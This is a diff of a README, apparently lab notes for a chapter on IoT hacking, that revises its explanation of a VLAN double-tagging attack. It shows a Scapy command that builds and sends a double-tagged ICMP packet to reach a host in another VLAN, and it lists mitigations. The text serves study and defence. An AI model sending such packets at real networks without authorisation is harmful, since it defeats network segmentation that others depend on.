CybernetSamurai/Practical_IoT_Hacking/Chapter4/Double_Tagging/README.md

 ![](assets/wireshark-server-segmentation.png)

 ## Exploit
-Craft a double-tagged ICMP packet with Scapy
+Craft a double-tagged ICMP echo request packet with Scapy.
+The outer tag should reflect the native VLAN to be stripped by the first switch (`vlan=1`), while the inner tag will be where our target resides (`vlan=20`).

 <pre>
   >>> packet = Ether(dst='ff:ff:ff:ff:ff:ff')/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.0.250')/ICMP()
   >>> sendp(packet, iface="eth0")
-  .
-  Sent 1 packets.
 </pre>

 ## Mitigations
-You can prevent double-tagging attacks by:
+Double tagging attacks can be mitigated by:
 - Setting the native VLAN to an unused VLAN
 - Forcing all trunks to tag all traffic (i.e., vlan dot1q tag native)
 - Avoiding VLAN 1 for any user-access ports